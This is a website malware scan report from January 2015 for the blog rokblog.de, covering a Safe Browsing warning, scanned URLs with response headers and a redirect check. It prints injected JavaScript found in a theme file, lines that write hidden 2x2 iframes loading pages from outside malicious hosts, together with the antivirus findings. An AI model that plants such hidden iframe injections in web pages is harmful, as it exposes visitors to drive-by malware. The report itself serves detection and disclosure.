Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rokblog.de
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rokblog.de/ | HTTP/1.1 301 Moved Permanently Cache-Control: private, max-age=0, pre-check=0 Connection: close Date: Wed, 14 Jan 2015 00:44:29 GMT Location: http://www.rokblog.de/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 13 Jul 2011 10:14:54 GMT Set-Cookie: PHPSESSID=1b7c722c8a671cdc69fdc03af99bbf26; path=/ X-Pingback: http://www.rokblog.de/xmlrpc.php | clean |
http://www.rokblog.de/ | 200 OK Content-Length: 92774 Content-Type: text/html | clean |
http://www.rokblog.de/wp-content/themes/ticklist.de/events.js | 200 OK Content-Length: 1015 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=1127187></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bangkokescortmodel.com/zcmd.html?j=1127187></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.alt } catch(err) {}
try { (s2blind)?pageTracker._trackEvent('c', 'sent', '2'):pageTracker._trackEvent('c', 'sent', '2'); } catch(err) {}
try { (s3blind)?pageTracker._trackEvent('c', 'sent', '3'):pageTracker._trackEvent('c', 'sent', '3'); } catch(err) {}
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1127187 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1127187>
Hidden iFrame found. size: 2x2 src: http://adottareadistanza.org/chof.html?j=1127187 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=1127187>
Hidden iFrame found. size: 2x2 src: http://bangkokescortmodel.com/zcmd.html?j=1127187 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bangkokescortmodel.com/zcmd.html?j=1127187>
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html>
http://rokblog.de/../2010/04/24/core-review/ | 400 Bad Request Content-Length: 226 Content-Type: text/html | clean |
http://rokblog.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://rokblog.de/../rokletter | 400 Bad Request Content-Length: 226 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rokblog.de
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: private, max-age=0, pre-check=0
Connection: close
Date: Wed, 14 Jan 2015 00:44:29 GMT
Location: http://www.rokblog.de/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 13 Jul 2011 10:14:54 GMT
Set-Cookie: PHPSESSID=1b7c722c8a671cdc69fdc03af99bbf26; path=/
X-Pingback: http://www.rokblog.de/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rokblog.de
Referer: http://www.google.com/search?q=rokblog.de
Result:
The result is similar to the first query. There are no suspicious redirects found.